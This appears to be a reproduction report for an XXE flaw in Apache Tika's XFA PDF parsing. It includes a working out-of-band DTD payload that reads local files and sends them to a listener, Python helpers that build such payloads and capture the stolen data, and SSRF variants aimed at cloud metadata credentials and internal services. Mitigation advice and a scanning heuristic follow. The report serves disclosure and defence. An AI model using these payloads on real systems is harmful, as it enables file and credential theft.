- Product / Component: Apache Tika (tika-core + tika-parser-pdf-module) - XFA PDF Parser
- Impact: An unauthenticated attacker can exfiltrate arbitrary local files from systems that parse malicious PDFs. Data is sent to attacker-controlled servers via HTTP requests, enabling "blind" XXE exploitation where parser output is not visible. The flaw also enables SSRF against internal services (cloud metadata endpoints, internal APIs).
- Severity: High (CVSS: 9.8 Critical per GHSA)
- Affected Versions: tika-core 1.13 - 3.2.1, tika-parser-pdf-module 2.0.0 - 3.2.1
- Fixed: Apache Tika 3.2.2 (commit bfee6d5)
- Reproduction Status: CONFIRMED (Tika 3.2.1, OpenJDK 21.0.9, Ubuntu 22.04)
- Identifiers:
  - CVE-2025-54988
  - CVE-2025-66516
  - GHSA-f58c-gq56-vjjf
Apache Tika's PDF parser delegates XFA (XML Forms Architecture) processing to the Xerces XML parser with external entity resolution enabled. When Tika processes a malicious PDF containing an XFA form whose DOCTYPE declaration references an external DTD, the attack proceeds as follows:
- Tika parses the PDF and encounters the embedded XFA XML
- Xerces resolves the external DTD from an attacker-controlled server
- The DTD defines parameter entities that:
  - Read local files via file:// URIs (e.g., /etc/hostname, /etc/passwd)
  - Construct a URL containing the file contents as a parameter
- Xerces makes an outbound HTTP request to http://attacker/?data=<file_contents>
- The attacker receives the exfiltrated data in their server logs
Key vulnerability characteristics:
- Works in "blind" scenarios where parser output isn't returned to the attacker
- Silent exfiltration via network - no visible indication in parser output
- Can target any file readable by the Tika process
- Enables SSRF to internal services (AWS metadata at 169.254.169.254, internal APIs)
The fix in Tika 3.2.2 disables external parameter entity resolution for XFA parsing, preventing the DTD fetch and subsequent data exfiltration.
┌─────────────────┐     ┌──────────────────┐     ┌─────────────────┐
│  Malicious PDF  │────▶│   Apache Tika    │────▶│ Attacker Server │
│ with XFA + DTD  │     │      3.2.1       │     │   (port 8888)   │
│    reference    │     │                  │     │                 │
└─────────────────┘     └──────────────────┘     └─────────────────┘
                                 │                         │
                                 │ 1. GET /evil.dtd        │
                                 │────────────────────────▶│
                                 │                         │
                                 │ 2. DTD with entities    │
                                 │◀────────────────────────│
                                 │                         │
                                 │ 3. Read /etc/hostname   │
                                 │    (local file)         │
                                 │                         │
                                 │ 4. GET /?data=<hostname>│
                                 │────────────────────────▶│
                                 │                         │
                                 │                   EXFILTRATED!
- Java 17+ (tested with OpenJDK 21.0.9)
- Python 3.x (for HTTP server and PoC generator)
- Git
- Network connectivity (or localhost testing)
# Run the reproduction script
./repro/reproduction_steps.sh
The script:
- Clones the public PoC from https://github.com/mgthuramoemyint/POC-CVE-2025-54988
- Downloads tika-app-3.2.1.jar from Maven Central
- Generates malicious PDF (malicious_oob.pdf) with embedded XFA and external DTD reference
- Creates evil.dtd that extracts /etc/hostname and sends it to localhost:8888
- Starts Python HTTP server on port 8888 to serve DTD and capture exfiltrated data
- Executes Tika against the malicious PDF
- Verifies the exfiltration by checking server logs
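The listener step can be approximated with a small Python server. This is a minimal sketch and not the PoC's actual listener: `CapturingHandler`, `make_listener`, and the `dtd_dir` argument are hypothetical names chosen for illustration. It serves files such as evil.dtd from a directory and records whatever arrives in the `data` query parameter.

```python
import threading
from functools import partial
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlsplit


class CapturingHandler(SimpleHTTPRequestHandler):
    """Serve files from a directory and record any ?data=... values seen."""

    # Hypothetical shared store; class-level so every request appends to it.
    captured = []

    def do_GET(self):
        query = parse_qs(urlsplit(self.path).query)
        if "data" in query:
            # Record the value and answer with an empty 200 response.
            self.captured.extend(query["data"])
            self.send_response(200)
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        # Anything else (for example /evil.dtd) is served from disk.
        super().do_GET()


def make_listener(dtd_dir, port=8888, host="127.0.0.1"):
    """Start the listener in a background thread and return the server."""
    handler = partial(CapturingHandler, directory=dtd_dir)
    server = ThreadingHTTPServer((host, port), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Calling `make_listener("/path/to/dtd/")` before running Tika and inspecting `CapturingHandler.captured` afterwards would show the exfiltrated values without reading the access log by hand.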
- Create the malicious DTD (evil.dtd):
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8888/?data=%file;'>">
%all;
- Create PDF with XFA containing:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8888/evil.dtd">
%dtd;
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">&send;</xdp:xdp>
- Start listener:
python3 -m http.server 8888 --directory /path/to/dtd/
- Parse with Tika:
java -jar tika-app-3.2.1.jar malicious.pdf
- Check listener logs for exfiltrated data
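For repeated runs in a lab, the two payload texts from the manual steps can be templated with a short Python helper. This is a sketch under stated assumptions: `build_evil_dtd` and `build_xfa_xml` are hypothetical names, not functions from the public PoC, and embedding the XFA XML into a PDF is still left to the PoC generator.

```python
def build_evil_dtd(target_file, callback_base):
    """Return DTD text that reads target_file and appends it to a callback URL.

    target_file is an absolute path such as /etc/hostname; callback_base is
    the listener origin such as http://127.0.0.1:8888 (no trailing slash).
    """
    file_entity = '<!ENTITY % file SYSTEM "file://' + target_file + '">'
    send_decl = "<!ENTITY send SYSTEM '" + callback_base + "/?data=%file;'>"
    all_entity = '<!ENTITY % all "' + send_decl + '">'
    return "\n".join([file_entity, all_entity, "%all;"]) + "\n"


def build_xfa_xml(dtd_url):
    """Return the XFA XML whose DOCTYPE pulls in the external DTD at dtd_url."""
    return "\n".join([
        '<?xml version="1.0" encoding="UTF-8"?>',
        "<!DOCTYPE foo [",
        '<!ENTITY % dtd SYSTEM "' + dtd_url + '">',
        "%dtd;",
        "]>",
        '<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">&send;</xdp:xdp>',
    ]) + "\n"
```

With `target_file="/etc/hostname"` and `callback_base="http://127.0.0.1:8888"`, the output matches the evil.dtd shown in the steps above.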
127.0.0.1 - - [09/Dec/2025 15:25:57] "GET /evil.dtd HTTP/1.1" 200 -
127.0.0.1 - - [09/Dec/2025 15:25:57] "GET /?data=lima-pruva-ghsa-f58c-gq56-vjjf-apache-tika-xxe-oob-e-20251209134317 HTTP/1.1" 200 -
Analysis:
- First request: Tika fetched evil.dtd from the attacker server
- Second request: Tika sent the contents of /etc/hostname (the VM hostname) in the data parameter
- Both requests occurred within the same second, demonstrating immediate exploitation
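The same check can be automated by pulling the `data` parameter out of the listener log. The following is a minimal sketch that assumes the log uses the default `python3 -m http.server` access-log format shown above; `extract_exfiltrated` is a hypothetical helper name.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Matches the request line inside an http.server access-log entry.
REQUEST_RE = re.compile(r'"GET (?P<path>\S+) HTTP/[\d.]+"')


def extract_exfiltrated(log_lines):
    """Return the values of the data parameter found in logged GET requests."""
    values = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not an access-log line for a GET request
        query = parse_qs(urlsplit(match.group("path")).query)
        values.extend(query.get("data", []))
    return values
```

A non-empty result after running Tika against the test PDF indicates that the out-of-band request was made.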
- Java: OpenJDK 21.0.9
- Python: 3.10.12
- OS: Ubuntu 22.04 (Lima VM)
- Tika Version: 3.2.1 (vulnerable)
- Malicious PDF: artifacts/tika-oob-runs/run-*/payload/malicious_oob.pdf
- Evil DTD: artifacts/tika-oob-runs/run-*/payload/evil.dtd
- Listener logs: logs/listener_*.log
- Tika output: logs/tika_*.log
- PoC source: artifacts/POC-CVE-2025-54988/
An organization uses Tika to extract text/metadata from user-uploaded PDFs. An attacker uploads a malicious PDF to exfiltrate:
- AWS credentials from ~/.aws/credentials
- Environment variables containing secrets
- Application configuration files
- Database connection strings
The attacker crafts a DTD to access cloud metadata:
<!ENTITY % file SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
This enables credential theft from AWS, GCP, and Azure instances running Tika.
The attacker uses XXE to probe internal services:
<!ENTITY % file SYSTEM "http://internal-api:8080/health">
This lets the attacker map internal infrastructure and identify additional attack surfaces.
- Upgrade to Tika 3.2.2 or later
<dependency>
  <groupId>org.apache.tika</groupId>
  <artifactId>tika-core</artifactId>
  <version>3.2.2</version>
</dependency>
- If upgrade is not immediately possible:
  - Disable XFA parsing entirely via tika-config.xml
  - Implement network egress filtering to block unexpected outbound requests
  - Run Tika in a sandboxed environment with no network access
- Network Controls:
  - Block outbound HTTP/HTTPS from document processing services
  - Implement allow-list for necessary external resources
  - Monitor for unusual DNS queries or outbound connections
- File System Isolation:
  - Run Tika with minimal file system permissions
  - Use containerization with read-only root filesystem
  - Mount only necessary directories
- Input Validation:
  - Scan uploaded PDFs for suspicious XML structures before processing
  - Implement file size limits to prevent resource exhaustion
  - Consider using a separate, isolated service for PDF processing
- Monitoring:
  - Alert on Tika processes making unexpected network connections
  - Log all outbound requests from document processing infrastructure
  - Monitor for access to sensitive files
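The Input Validation suggestion to scan uploaded PDFs for suspicious XML structures could look roughly like the Python sketch below. It is a heuristic only, and the details are assumptions: `looks_suspicious` is a hypothetical name, the scan covers raw bytes and plain Flate-compressed streams, and it would miss other filters, encrypted documents, object streams with unusual layout, and non-ASCII-compatible encodings such as UTF-16. It complements upgrading but does not replace it.

```python
import re
import zlib

# Byte patterns that suggest a DTD, in particular one with external references.
SUSPICIOUS = re.compile(rb"<!DOCTYPE|<!ENTITY[^>]*\bSYSTEM\b", re.IGNORECASE)
# Naive match for the body of a PDF stream object.
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def looks_suspicious(pdf_bytes):
    """Flag PDFs whose raw or Flate-compressed streams contain a DTD."""
    if SUSPICIOUS.search(pdf_bytes):
        return True
    for match in STREAM_RE.finditer(pdf_bytes):
        try:
            # decompressobj tolerates truncated input better than decompress.
            inflated = zlib.decompressobj().decompress(match.group(1))
        except zlib.error:
            continue  # not a plain Flate stream; skipped by this sketch
        if SUSPICIOUS.search(inflated):
            return True
    return False
```

A service might quarantine any upload for which `looks_suspicious` returns `True` rather than passing it to Tika, accepting some false positives on legitimate XFA forms that carry a DOCTYPE.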
- GHSA-f58c-gq56-vjjf - GitHub Security Advisory
- CVE-2025-54988 - CVE Record
- CVE-2025-66516 - NVD Entry
- Apache Tika Security - Official Security Page
- Fix Commit bfee6d5 - Patch Details
- POC-CVE-2025-54988 - Public PoC
- CWE-611: Improper Restriction of XML External Entity Reference
- CWE-918: Server-Side Request Forgery (SSRF)
- CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Report Generated: 2025-12-09
Reproduction Status: CONFIRMED
Idempotency Verified: Yes (multiple successful runs)